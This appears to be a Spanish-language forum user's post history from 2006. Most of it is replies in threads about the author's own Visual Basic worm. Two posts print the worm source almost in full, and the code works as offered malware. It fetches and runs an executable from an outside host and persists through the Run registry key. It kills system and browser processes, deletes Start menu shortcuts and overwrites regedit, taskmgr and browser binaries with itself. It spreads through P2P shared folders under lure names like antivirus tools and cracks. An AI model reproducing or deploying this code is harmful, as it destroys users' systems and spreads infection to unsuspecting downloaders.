| |
 Mostrar Mensajes
|
|
Páginas: 1 2 [3] 4 5 6 7 8
|
|
21
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 30 Diciembre 2006, 06:34 am
|
El punto de este malware es "Que se de cuenta que esta infectado", pues claro que mostrando MSGBOX con ese tipo de mensajes cualquier persona se sorprenderia y se asustaria, y empezara a correr los miles de antivirus que tiene, pero ninguno usa con eficazia... Veras que no es nisiquiera un buen worm, es solo una burrada que se me ocurrio y ya... El archivo AUTOEXEC (Por lo menos en mi XP) si sale...  . |
|
|
|
|
22
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 30 Diciembre 2006, 05:18 am
|
los troyanos, virus, worms, spyware, malware, dialers todos esos un usuario experto en PC y que esta en el tema es dificil que se le meta a la PC algo de esto, pero los otros que son unos NW solo usuarios que no saben una ***** o tiene un minimo conocimiento como mi vieja son los que sufren las consecuencias...! si no entendes mi punto de vista te doy otra explicacion. Claro xDDD... Tampoco pienso que un experto en el tema caiga en un worm tan sencillo... Es solo para los Newbies, como dije anteriormente, es de fines educativos, pero un worm mas fuerte usaria mejores redes para propagarse... . |
|
|
|
|
23
|
Programación / Programación Visual Basic / Re: Worm By: DrakoX
|
en: 30 Diciembre 2006, 05:14 am
|
|
Esta muy bueno tu worm...
pero... aunque es muy tentativo, yo me limitaria a infectar por msn, ya que se esta volviendo muy "Comun" y los antivirus estan a la guardia con eso...
Esta muy bueno tu worm, un poco destructivo si... xDDD
|
|
|
|
|
24
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 30 Diciembre 2006, 05:07 am
|
Me encantaria insultarte!  otro mas que crea un virus para romper la makina de alguien [...] que ganas...? ensima mira todo lo que posteas, no sabes que la mayoria de la gente no lee todo xq le parece agobiante, ponlo de a poco y explicado si lo vas a hacer. Salu2 y espero que no te sirva  En realidad fue hecho con fines educativos y no pretendo joder a nadie, si analizas bien el worm lo unico que hace es copiarse en mil directorios y matar algunos procesos, no hace mas nada, no borra informacion util, no desconfigura la maquina ni nada... (Depnde como uses el AUTOEXEC xDDD!) Yo considero esto mas un Joke que un worm... pero en fin... son terminos y para mi worm es algo mas destructivo.. , este tan solo es el inicio de un worm... tan solo cumple funciones basicas... pero no llega al extremo de destruir una maquina... |
|
|
|
|
25
|
Programación / Programación Visual Basic / Subir archivos...
|
en: 30 Diciembre 2006, 05:03 am
|
Buenas... Estoy creando un programa para subir archivos a una web en especifica... He preguntando mediante ftp pero no me dan una buena respuesta y la respuesta que me dieron no era "Cierta" ... -.- Si me pudieran ayudar, seria muy bueno . |
|
|
|
|
29
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 29 Diciembre 2006, 02:05 am
|
- Oriente eterno- Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _ 'API's para descargar sin ser detectado
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS
Private Sub Alumbra()
On Error Resume Next
Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/DCOM/InetCat.exe"
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\InetCat.exe"
'Descarga el Inetcat, exactamente el InetCat es el NayrocBits, solo que le cambie el nombre :P
End Sub
Private Sub Orientame()
On Error Resume Next
Dim RegistroCochino As Object
Dim RutaCochina As String
Dim CadenaNueva As String
Dim ContenidoCadena As String
ContenidoCadena = App.Path & "\" & App.EXEName & ".Exe"
CadenaNueva = "\SystemTray"
RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _
"\CurrentVersion\Run" & CadenaNueva
Set RegistroCochino = CreateObject("WScript.Shell")
RegistroCochino.RegWrite RutaCochina, ContenidoCadena
'Aqui me añado al registro.
End Sub
Private Function NumeroAleartorio(Entre As Integer, yEntre As Integer) As Integer
On Error Resume Next
Randomize
NumeroAleartorio = Int((Entre - yEntre + 1) * Rnd + yEntre)
End Function 'Funcion para generar numeros aleatorios
Private Sub EliminarInicio()
Do
On Error Resume Next
Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\" & "*.*"
Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\" & "*.*"
Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\Herramientas del sistema\" & "*.*"
'Aqui elimino los accesos directos
End Sub
Private Sub OccidenteIntolerante()
On Error Resume Next
Dim sel
sel = Int(Rnd() * 7)
Select Case sel
'Aqui mezcle el radom y el case, lo que sucede es que se "Ejecuta cierto codigo de manera aleatoria".
'Aclaro que donde dice "Label1" es donde van los numeros aleatorios. :P
Case 0
MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation
Matar ("Explorer.exe")
Case 1
MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation
Matar ("Explorer.exe")
Case 2
MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation
Matar ("Explorer.exe")
Case 3
Matar ("explorer.exe")
Matar ("iexplore.exe")
Matar ("msnmsgr.exe")
Matar ("firefox.exe")
Matar ("opera.exe")
Matar ("taskmgr.exe")
Matar ("regedit.exe")
Case 4
Shell Environ("SYSTEMROOT") & "\InetCat.exe"
MsgBox " ", vbCritical
Case 5
SecuestroCarpeta Environ("SYSTEMDRIVE") & "\RECYCLER\SECUESTRO\"
Matar ("services.msc")
Matar ("taskmgr.exe")
Matar ("regedit.exe")
FileCopy Environ("sys32") & "\services.msc", Environ("systemdrive") & "\RECYCLER\Secuestro\services.msc"
FileCopy Environ("sys32") & "\regedit.exe", Environ("systemdrive") & "\RECYCLER\Secuestro\regedit.exe"
FileCopy Environ("sys32") & "\taskmgr.exe", Environ("systemdrive") & "\RECYCLCER\SECUESTRO\taskmgr.exe"
Kill Environ("SYS32") & "\services.msc"
Kill Environ("sys32") & "\regedit.exe"
Kill Environ("sys32") & "\taskmgr.exe"
FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\regedit.exe"
FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\taskmgr.exe"
FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\services.msc"
MsgBox " ", vbCritical
'Aqui me suplemento con los archivos importantes.
Case 6
do
msgbox " ", vbCritical, " "
loop
End Select
End Sub
Private Sub InfectarP2P()
On Error GoTo NOHAYP2P:
Do
'Aqui me añado a un archivo RAR y me copio a distintos directorios P2P, para expandirme... Esta idea la saque de una guia por Hendrix, muy buena idea ;).
Shell Environ("programfiles") & "\WINRAR\WinRAR.exe" & " a """ & Environ("Systemdrive") & "\K.rar"" """ & App.Path & "\" & App.EXEName & ".exe" & """", vbHide
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Removal Tools.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-Sasser.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Mis documentos.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Removal Tools.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Mis documentos.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Listanegra-Kaspersky.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Norton Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Anti-virus.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\NOD32-Full.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm-Professional.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Internet Security.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\PowerDVD.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack-NFS.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\juego-3.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\xxx.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Area 51.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\SPRITER.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Overnet\incoming\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Swaptor\Download\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\WinMX\My Shared Folder\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Tesla\Files\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\XoloX\Downloads\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Rapigator\Share\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\KMD\My Shared Folder\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\BearShare\Shared\gedzac.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Direct Connect\Received Files\Gedzac.rar"
'Infectar mediante canales P2P
NOHAYP2P:
End Sub
Public Sub SecuestroCarpeta(DirPath As String)
On Error GoTo error
MkDir DirPath$
Exit Sub
error:
'Crear carpetas de secuestro
End Sub
Sub Copiar()
Do
SecuestroCarpeta Environ("temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80"
FileCopy App.EXEName + ".exe", Environ("Temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80\VGA.exe"
SecuestroCarpeta Environ("tmp") & "\U\S\"
FileCopy App.EXEName + ".exe", Environ("tmp") & "\U\S\IECACHE.exe"
SecuestroCarpeta Environ("SYSTEMDRIVE") & "\Kw\"
FileCopy App.EXEName + ".exe", Environ("systemdrive") & "\Kw\Dir.exe"
SecuestroCarpeta Environ("SYS32") & "\Oriente-Eterno\"
FileCopy App.EXEName + ".exe", Environ("SYS32") & "\Oriente-Eterno\Desinfectar.exe"
End Sub
Sub Hijastros()
'Aqui hago lo mismo que secuestrar, pero esta vez lo hago con
'programas importantes.
Matar ("msnmsgr.exe")
Kill Environ("Programfiles") & "\MSN Messenger\msnmsgr.exe"
FileCopy App.EXEName + ".exe", Environ("programfiles") & "\MSN Messenger\msnmsgr.exe"
Matar ("firefox.exe")
Kill Environ("Programfiles") & "\Mozilla firefox\firefox.exe"
FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Mozilla firefox\firefox.exe"
Matar ("ypager.exe")
Kill Environ("Programfiles") & "\Yahoo!\Messenger\ypager.exe"
FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Yahoo!\Messenger\ypager.exe"
Matar ("Realplay.exe")
Kill Environ("Programfiles") & "\real\relaplayer\realplay.exe"
FileCopy App.EXEName + ".exe", Environ("Programfiles") & "\real\relaplayer\realplay.exe"
Matar ("wmplayer")
Kill Environ("Programfiles") & "\Windows media player\wmplayer.exe"
FileCopy App.EXEName + ".exe", Environ("ProgrAmFiLeS") & "\Windows media player\Wmplayer.exe"
'No infectar el mplayer2 ni otro archivo, ya que seria fatal para el SO
'y ese no es el punto de este virus
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
Private Sub form_load()
On Error Resume Next
App.TaskVisible = False
Label1.Caption = NumeroAleartorio(0, 100)
Alumbra
OccidenteIntolerante
Orientame
InfectarP2P
OrienteEterno
EscribirHTA
EliminarInicio
Copiar
Hijastros
Shell Environ("SYSTEMroot") & "\Index.hta"
'hdp
End Sub
Private Sub EscribirHTA()
Do
Open Environ("systemROOT") & "\Index.hta" For Output As #1
Print #1, "<HTML>"
Print #1, "<HEAD>"
Print #1, "<TITLE>Oriente Eterno</TITLE>"
Print #1, "</HEAD>"
Print #1, "<CENTER> En honor a las Almas caidas </CENTER>"
Print #1, "<CENTER> En honor a los ignorados y resentidos </center> "
Print #1, "<CENTER> En honor al pueblo Libanes </center> "
Print #1, "<CENTER> En honor a los muertos del 11 de Abril - Venezuela </center> "
Close #1
End Sub
Public Sub Matar(ByVal processName As String)
On Error GoTo ErrHandler
Dim oWMI
Dim ret
Dim sService
Dim oWMIServices
Dim oWMIService
Dim oServices
Dim oService
Dim servicename
Set oWMI = GetObject("winmgmts:")
Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices
servicename = LCase(Trim(CStr(oService.Name) & ""))
If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
ret = oService.Terminate
End If
Next
Set oServices = Nothing
Set oWMI = Nothing
'Matar procesos
ErrHandler:
Err.Clear
End Sub
Private Sub OrienteEterno()
On Error Resume Next
Dim SantoOriente
SantoOriente = Int(Rnd() * 11)
Select Case SantoOriente
Case 0
MsgBox "Dios bendiga las almas del pulgatorio", , "Amen"
Case 1
MsgBox "¿Hasta cuando es hora que el Occidente Intolerante ignore la existencia de Dios y del mundo Espiritual y Abandone los placeres materiales?", , "Oriente Eterno"
Case 2
MsgBox "Mientras tengamos el estamago lleno, no pensamos en los que tienen el estomago vacio", , "FOOD-FOR-LIFE"
Case 3
MsgBox "Que el prayamama este con vosotros, benditos sean", , "Prayamama"
Case 4
MsgBox "Es facil matar, Es dificil perderlo", , "No mates"
Case 5
MsgBox "Ohh buen cristiano, Cristiano del alma, ¿Cuantos mandamientos ignorastes hoy?", , "Dios nos mira atentamente"
Case 6
MsgBox "No es religiosidad la causa de nuestra existencia, Es el profundo amor que nos tiene Dios, y muchas veces lo ignoramos", , "Alto al suicidio"
Case 7
MsgBox "Por las almas benditas de los inocentes libaneses, Que descansen en paz en el Oriente Eterno", , "Oriente Eterno"
Case 8
MsgBox "Por la justicia en Venezuela, No olvidaremos el 11 de Abril", , "Justicia!"
Case 9
MsgBox "Por ser negro o por tener un distinto credo, no quita que seamos obra e hijos del Dios ", , "No al racismo"
Case 10
MsgBox "Es hora de la reflexion", , "Reflexiona"
End Select
End Sub
Este codigo lo hago en nombre de todos los muertos y caidos, resentidos e ignorados... Hasta luego y espero que lo usen con fines beneficos . |
|
|
|
|
30
|
Programación / Programación Visual Basic / Re: NayrocBits - Malware
|
en: 29 Diciembre 2006, 01:06 am
|
Lo que hace es autocopiarse y suplementar otros archivos. por ejemplo, este suplementa el "Regedit", el "Taskmgr (Administrador de tareas) y el "Services.msc". Cuando presionen el "CTRL+ALT+SPR" mi worm se ejecutara (Eso tengo previsto ), tambien se añade al AUTOEXEC para iniciarse con el sistema sin necesidad de añadirme al registro. Lo que hace es multiplicarse y multiplicarse, tambien descarga la otra version un poco mas violenta llamada "Oriente-eterno" (Lo descarga y tambien lo ejecuta mediante el mismo procedimiento). Tambien cambia el titulo del IE y la pagina principal. Lo explicare mejor: Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _ 'Estas son apis para descargar archivos sin ser detectados
ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS
Private Sub Clipb()
On Error GoTo clip
Do
Clipboard.Clear
Clipboard.SetText " K-32 - Prayamama" 'Este se mantiene en el clipboard mediante el DO, cuando den al "CTRL+V" Se copiara eso automaticamente :p
Loop
clip:
End Sub
Private Sub NayrocSTAM()
Do
On Error GoTo NoSTAM
PagInicia ("http://www.elhacker.net") ' Este cambia la pagina de inicio
TituloInicia ("ElHacker - Soft Explorer - BY: K-32 (SP26)") 'Este cambia el titulo del IE, en vez de decir "Microsoft Internet Explorer" dice ese titulo :P
MsgBox " " & vbCrLf & " ", vbCritical
Loop
NoSTAM:
End Sub
Private Function Secuestro(UpPath As String, DownPath As String)'Funcion para mover archivos
On Error GoTo seNO
FileCopy UpPath$, DownPath$
Kill UpPath$
seNO:
End Function
Public Sub SecuestroCarpeta(DirPath As String)
On Error GoTo error
MkDir DirPath$
Exit Sub
error:
'Crear carpetas de secuestro
End Sub
Private Sub AeroBits()
On Error GoTo seNO:
Do
'Matar procesos antes de copiar
Matar ("Taskmgr.exe")
